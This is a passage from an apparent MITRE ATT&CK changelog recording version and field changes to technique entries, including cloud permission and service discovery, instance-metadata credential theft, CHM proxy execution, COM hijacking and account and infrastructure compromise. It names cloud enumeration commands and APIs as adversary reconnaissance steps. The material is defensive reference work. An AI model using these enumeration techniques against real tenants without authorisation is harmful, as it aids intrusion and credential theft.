  New value: Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group. With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance). Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.
external_references[2]['source_name']: Black Hills Red Teaming MS AD Azure, 2018 → Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
external_references[2]['description']: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019. → Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.
external_references[2]['url']: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/ → https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
external_references[3]['source_name']: Google Cloud Identity API Documentation → Black Hills Red Teaming MS AD Azure, 2018
external_references[3]['description']: Google. (n.d.). Retrieved March 16, 2021. → Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019.
external_references[3]['url']: https://cloud.google.com/identity/docs/reference/rest → https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
external_references[4]['source_name']: Microsoft AZ CLI → Google Cloud Identity API Documentation
external_references[4]['description']: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019. → Google. (n.d.). Retrieved March 16, 2021.
external_references[4]['url']: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest → https://cloud.google.com/identity/docs/reference/rest
external_references[5]['source_name']: Microsoft Msolrole → Microsoft AZ CLI
external_references[5]['description']: Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019. → Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
external_references[5]['url']: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0 → https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
external_references[6]['source_name']: GitHub Raindance → Microsoft Msolrole
external_references[6]['description']: Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019. → Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019.
external_references[6]['url']: https://github.com/True-Demon/raindance → https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Group: Group Enumeration → Command: Command Execution
x_mitre_data_sources[2]: Command: Command Execution → Application Log: Application Log Content
x_mitre_data_sources[4]: Application Log: Application Log Content → Group: Group Enumeration
x_mitre_version: 1.3 → 1.4
iterable_item_added
STIX Field: New value
external_references: {'source_name': 'GitHub Raindance', 'description': 'Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.', 'url': 'https://github.com/True-Demon/raindance'}

[T1552.005] Unsecured Credentials: Cloud Instance Metadata API

Current version: 1.4

Version changed from: 1.3 → 1.4

New Mitigations:

Details
dictionary_item_added
STIX Field: New value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New value
modified: 2022-03-08 21:37:23.589000+00:00 → 2023-03-21 13:56:27.910000+00:00
external_references[2]['source_name']: Krebs Capital One August 2019 → RedLock Instance Metadata API 2018
external_references[2]['description']: Krebs, B.. (2019, August 19). What We Can Learn from the Capital One Hack. Retrieved March 25, 2020. → Higashi, Michael. (2018, May 15). Instance Metadata API: A Modern Day Trojan Horse. Retrieved July 16, 2019.
external_references[2]['url']: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/ → https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse
external_references[3]['source_name']: RedLock Instance Metadata API 2018 → Krebs Capital One August 2019
external_references[3]['description']: Higashi, Michael. (2018, May 15). Instance Metadata API: A Modern Day Trojan Horse. Retrieved July 16, 2019. → Krebs, B.. (2019, August 19). What We Can Learn from the Capital One Hack. Retrieved March 25, 2020.
external_references[3]['url']: https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse → https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
x_mitre_version: 1.3 → 1.4

[T1526] Cloud Service Discovery

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API) Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)

New Description
An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs. Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API) For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu) Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable Cloud Logs](https://attack.mitre.org/techniques/T1562/008).
Details
dictionary_item_added
STIX Field: New value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
dictionary_item_removed
STIX Field: Old value
x_mitre_permissions_required: ['User']
values_changed
STIX Field: Old value → New value
modified: 2021-03-16 12:57:03.837000+00:00 → 2023-04-11 20:33:55.356000+00:00
description:
  Old value: An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API) Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
  New value: An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs. Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API) For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu) Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable Cloud Logs](https://attack.mitre.org/techniques/T1562/008).
external_references[1]['source_name']: Azure - Resource Manager API → Azure AD Graph API
external_references[1]['description']: Microsoft. (2019, May 20). Azure Resource Manager. Retrieved June 17, 2020. → Microsoft. (2016, March 26). Operations overview | Graph API concepts. Retrieved June 18, 2020.
external_references[1]['url']: https://docs.microsoft.com/en-us/rest/api/resources/ → https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview
external_references[2]['source_name']: Azure AD Graph API → Azure - Resource Manager API
external_references[2]['description']: Microsoft. (2016, March 26). Operations overview | Graph API concepts. Retrieved June 18, 2020. → Microsoft. (2019, May 20). Azure Resource Manager. Retrieved June 17, 2020.
external_references[2]['url']: https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview → https://docs.microsoft.com/en-us/rest/api/resources/
x_mitre_version: 1.2 → 1.3
iterable_item_added
STIX Field: New value
x_mitre_contributors: Thanabodi

[T1059] Command and Scripting Interpreter

Current version: 2.4

Version changed from: 2.3 → 2.4

Details
values_changed
STIX Field: Old value → New value
modified: 2022-04-19 18:31:48.827000+00:00 → 2023-03-27 16:43:58.795000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Process: Process Creation → Command: Command Execution
x_mitre_data_sources[1]: Module: Module Load → Process: Process Creation
x_mitre_data_sources[3]: Script: Script Execution → Module: Module Load
x_mitre_data_sources[4]: Command: Command Execution → Script: Script Execution
x_mitre_version: 2.3 → 2.4
iterable_item_added
STIX Field: New value
x_mitre_platforms: Office 365
x_mitre_platforms: Azure AD
x_mitre_platforms: IaaS
x_mitre_platforms: Google Workspace

[T1218.001] System Binary Proxy Execution: Compiled HTML File

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX Field: New value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
dictionary_item_removed
STIX Field: Old value
x_mitre_permissions_required: ['User']
values_changed
STIX Field: Old value → New value
modified: 2022-03-11 18:59:36.836000+00:00 → 2023-04-21 12:23:17.694000+00:00
external_references[1]['source_name']: Microsoft HTML Help May 2018 → Microsoft CVE-2017-8625 Aug 2017
external_references[1]['description']: Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved October 3, 2018. → Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability. Retrieved October 3, 2018.
external_references[1]['url']: https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk → https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625
external_references[2]['source_name']: Microsoft HTML Help ActiveX → Microsoft HTML Help May 2018
external_references[2]['description']: Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved October 3, 2018. → Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved October 3, 2018.
external_references[2]['url']: https://msdn.microsoft.com/windows/desktop/ms644670 → https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk
external_references[4]['source_name']: MsitPros CHM Aug 2017 → Microsoft HTML Help ActiveX
external_references[4]['description']: Moe, O. (2017, August 13). Bypassing Device guard UMCI using CHM – CVE-2017-8625. Retrieved October 3, 2018. → Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved October 3, 2018.
external_references[4]['url']: https://msitpros.com/?p=3909 → https://msdn.microsoft.com/windows/desktop/ms644670
external_references[5]['source_name']: Microsoft CVE-2017-8625 Aug 2017 → MsitPros CHM Aug 2017
external_references[5]['description']: Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability. Retrieved October 3, 2018. → Moe, O. (2017, August 13). Bypassing Device guard UMCI using CHM – CVE-2017-8625. Retrieved October 3, 2018.
external_references[5]['url']: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625 → https://msitpros.com/?p=3909
x_mitre_version: 2.0 → 2.1
iterable_item_added
STIX Field: New value
x_mitre_data_sources: Process: Process Creation
iterable_item_removed
STIX Field: Old value
x_mitre_data_sources: Process: Process Creation

[T1546.015] Event Triggered Execution: Component Object Model Hijacking

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field: New value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New value
modified: 2020-11-10 18:19:44.750000+00:00 → 2023-04-21 12:34:29.402000+00:00
external_references[1]['source_name']: Microsoft Component Object Model → Elastic COM Hijacking
external_references[1]['description']: Microsoft. (n.d.). The Component Object Model. Retrieved August 18, 2016. → Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting Persistence & Evasion with the COM. Retrieved September 15, 2016.
external_references[1]['url']: https://msdn.microsoft.com/library/ms694363.aspx → https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com
external_references[3]['source_name']: Elastic COM Hijacking → Microsoft Component Object Model
external_references[3]['description']: Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting Persistence & Evasion with the COM. Retrieved September 15, 2016. → Microsoft. (n.d.). The Component Object Model. Retrieved August 18, 2016.
external_references[3]['url']: https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com → https://msdn.microsoft.com/library/ms694363.aspx
x_mitre_data_sources[0]: Command: Command Execution → Module: Module Load
x_mitre_data_sources[1]: Process: Process Creation → Command: Command Execution
x_mitre_data_sources[3]: Module: Module Load → Process: Process Creation
x_mitre_version: 1.0 → 1.1

[T1586] Compromise Accounts

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos. Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).

New Description
Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos. Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).
Details
dictionary_item_added
STIX Field: New value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New value
modified: 2021-10-16 17:15:12.428000+00:00 → 2023-04-11 01:08:56.774000+00:00
description:
  Old value: Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos. Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).
  New value: Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos. Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).
x_mitre_data_sources[0]: Persona: Social Media → Network Traffic: Network Traffic Content
x_mitre_data_sources[1]: Network Traffic: Network Traffic Content → Persona: Social Media
x_mitre_version: 1.1 → 1.2
iterable_item_added
STIX Field: New value
external_references: {'source_name': 'Microsoft DEV-0537', 'description': 'Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.', 'url': 'https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/'}

[T1584] Compromise Infrastructure

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description

Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)

New Description

Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)
Details
values_changed
STIX Field | Old value | New value
modified | 2022-07-26 23:33:26.352000+00:00 | 2023-04-12 13:32:15.704000+00:00
description | Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) | Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090).(Citation: amnesty_nso_pegasus) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)
external_references[1]['source_name'] | FireEye DNS Hijack 2019 | amnesty_nso_pegasus
external_references[1]['description'] | Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020. | Amnesty International Security Lab. (2021, July 18). Forensic Methodology Report: How to catch NSO Group’s Pegasus. Retrieved February 22, 2022.
external_references[1]['url'] | https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html | https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/
external_references[2]['source_name'] | ICANNDomainNameHijacking | FireEye DNS Hijack 2019
external_references[2]['description'] | ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017. | Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020.
external_references[2]['url'] | https://www.icann.org/groups/ssac/documents/sac-007-en | https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
external_references[3]['source_name'] | Koczwara Beacon Hunting Sep 2021 | ICANNDomainNameHijacking
external_references[3]['description'] | Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021. | ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.
external_references[3]['url'] | https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2 | https://www.icann.org/groups/ssac/documents/sac-007-en
external_references[4]['source_name'] | Mandiant APT1 | Koczwara Beacon Hunting Sep 2021
external_references[4]['description'] | Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016. | Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.
external_references[4]['url'] | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf | https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
external_references[5]['source_name'] | Talos DNSpionage Nov 2018 | Mandiant APT1
external_references[5]['description'] | Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020. | Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.
external_references[5]['url'] | https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
external_references[6]['source_name'] | NSA NCSC Turla OilRig | Talos DNSpionage Nov 2018
external_references[6]['description'] | NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020. | Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.
external_references[6]['url'] | https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf | https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
external_references[7]['source_name'] | Mandiant SCANdalous Jul 2020 | NSA NCSC Turla OilRig
external_references[7]['description'] | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021. | NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.
external_references[7]['url'] | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation | https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf
external_references[8]['source_name'] | ThreatConnect Infrastructure Dec 2020 | Mandiant SCANdalous Jul 2020
external_references[8]['description'] | ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021. | Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.
external_references[8]['url'] | https://threatconnect.com/blog/infrastructure-research-hunting/ | https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
external_references[9]['source_name'] | FireEye EPS Awakens Part 2 | ThreatConnect Infrastructure Dec 2020
external_references[9]['description'] | Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016. | ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.
external_references[9]['url'] | https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html | https://threatconnect.com/blog/infrastructure-research-hunting/
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Domain Name: Active DNS | Internet Scan: Response Content
x_mitre_data_sources[2] | Internet Scan: Response Content | Domain Name: Domain Registration
x_mitre_data_sources[4] | Domain Name: Domain Registration | Domain Name: Active DNS
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX Field | Old value | New value
external_references | | {'source_name': 'FireEye EPS Awakens Part 2', 'description': 'Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.', 'url': 'https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html'}
x_mitre_contributors | | Shailesh Tiwary (Indian Army)

[T1552.007] Unsecured Credentials: Container API

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
dictionary_item_removed
STIX Field | Old value | New value
